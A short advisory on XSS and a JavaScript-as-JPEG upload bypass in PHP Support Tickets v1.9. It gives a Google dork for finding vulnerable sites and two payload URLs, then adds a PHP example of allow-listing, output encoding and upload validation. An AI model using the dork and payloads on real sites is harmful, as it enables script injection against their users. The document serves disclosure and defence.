Google dork: "PHP Support Tickets v1.9" inurl:index.php?action=

"PHP Support Tickets v1.9" by "Triangle Solutions Ltd" is vulnerable to XSS at index.php. Some installations also validate uploaded files poorly, so a JS file can be uploaded with a .jpg extension and then used to bypass browser XSS filters.

Demo 1 (XSS):
url: http://server.com/app_folder/index.php?action=Register

Sys_A501%20@%20Raza-Mexicana.org

Code:

Demo 2 (JS as JPEG):
url: http://server.com/app_folder/index.php?action=Login%3Cscript%20src=./upload/1671.jpg%3E%3C/script%3E

Code:
Register

Sys_A501 @ Raza-Mexicana.org

Sys_A501 sys_a501@raza-mexicana.org sys.a501@gmail.com www.raza-mexicana.org http://inrootwetrust.org.mx/
Login
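
The two fixes this advisory implies, as an added example that is not code from PHP Support Tickets: resolve `action` against an allow-list and encode it on output, and accept an upload as JPEG only when its content is JPEG. The function names, the allow-list contents and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not the application's own code. All names are hypothetical.

// Assumed set of valid actions, taken from the two demo URLs in the advisory.
const ALLOWED_ACTIONS = ['Login', 'Register'];

// Resolve ?action= against the allow-list instead of reflecting it.
function resolve_action(string $raw): string
{
    return in_array($raw, ALLOWED_ACTIONS, true) ? $raw : 'Login';
}

// Encode any value that still reaches HTML output.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Decide from the bytes, not the file name, whether an upload is a JPEG.
function is_real_jpeg(string $bytes): bool
{
    if (strncmp($bytes, "\xFF\xD8\xFF", 3) !== 0) {
        return false;                      // missing JPEG start-of-image marker
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    return $finfo->buffer($bytes) === 'image/jpeg';
}

// Serve stored uploads so a browser will not run them as script.
function send_upload_headers(): void
{
    header('Content-Type: image/jpeg');
    header('X-Content-Type-Options: nosniff'); // blocks <script src> on image/* responses
}

// Constructed sample input mirroring the advisory's demos.
$fromUrl = 'Login<script src=./upload/1671.jpg></script>';
$upload  = ['name' => '1671.jpg', 'bytes' => 'alert(document.domain);'];

// Unknown action values fall back to the default page.
echo 'action: ', html(resolve_action($fromUrl)), PHP_EOL;

// If the raw value must be displayed, it is rendered as inert text.
echo 'encoded: ', html($fromUrl), PHP_EOL;

// The .jpg name is ignored; only the content decides.
echo $upload['name'], ': ', is_real_jpeg($upload['bytes']) ? 'accepted' : 'rejected', PHP_EOL;
```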